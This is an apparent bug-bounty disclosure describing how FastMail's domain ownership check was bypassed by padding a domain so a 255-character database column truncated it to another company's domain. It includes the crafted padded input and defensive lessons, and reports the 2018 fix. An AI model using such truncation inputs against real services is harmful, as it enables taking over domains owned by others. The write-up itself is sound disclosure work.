FastMail.com Domain Ownership Bypass via Database Truncation

Just a quick one: be wary of silent truncation in SQL databases.

In this case, I discovered that when adding email domains to FastMail, it was possible to bypass the ownership check for existing domains.

For example, if you only own id-rsa.pub, somebody else owns microsoft.com, and you try to add staff.microsoft.com:

However, if you know (or can guess!) that the database column is only 255 characters, then you can try add add a value where the domain falls on the truncation boundary:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxx.microsoft.com.id-rsa.pub

It will pass the ownership check (because you own id-rsa.pub), but the value stored to the database will be a completely different eTLD+1:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxx.microsoft.com.

And the database driver did not even warn you about it. Whoops!

Lessons:

• Enforce length limits on both the front-end and back-end.
• Be sure your columns are at least as long as your length limits.

Bounty

I reported this issue to FastMail.com on 2018-01-01 and received a notification within 22 hours (issue fixed), awarding a $100USD bug bounty and mention in the hall of fame.